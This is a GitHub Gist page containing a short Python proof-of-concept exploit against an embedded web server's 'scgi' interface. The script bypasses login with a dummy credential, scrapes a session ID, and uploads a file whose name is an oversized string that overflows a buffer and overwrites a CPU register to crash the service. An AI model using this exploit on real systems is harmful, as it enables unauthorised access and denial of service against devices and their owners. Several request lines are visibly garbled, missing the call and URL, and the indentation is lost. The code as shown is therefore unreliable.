Skip to content

Instantly share code, notes, and snippets.

Last active Jul 12, 2020
What would you like to do?
import requests
from bs4 import BeautifulSoup
import sys
host = sys.argv[1]
URL = "http://"+host+"/scgi?sid=0&pid=dologin"
head = {"Referer" : "http://"+host+"/scgi?pid=0&action=dologin"}
# no auth login
payload = {"fd":"Cg=="}
junk = "E"*10000
def getsid():
r =, headers=head, data=payload)
# fudge to get valid SID
rt = r.text
soup = BeautifulSoup(rt,"lxml")
nsid = soup.a
bsid = nsid.get('href')
bsid = bsid[9:49]
return bsid
def docrash():
crash = "A"*367 # buffer to crash
crash += "C"*4 # overwrites next 4 bytes of EBX
file = {"foo":"bar"}
files = {"file":(crash,junk, "application/octet-stream", {'Expires':'0'})}
formURL = "http://"+host+"/scgi?sid="+getsid()+"&pid=uploadfile_name1.htm"
rf =, headers=head, files=files)
if __name__ == "__main__":
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment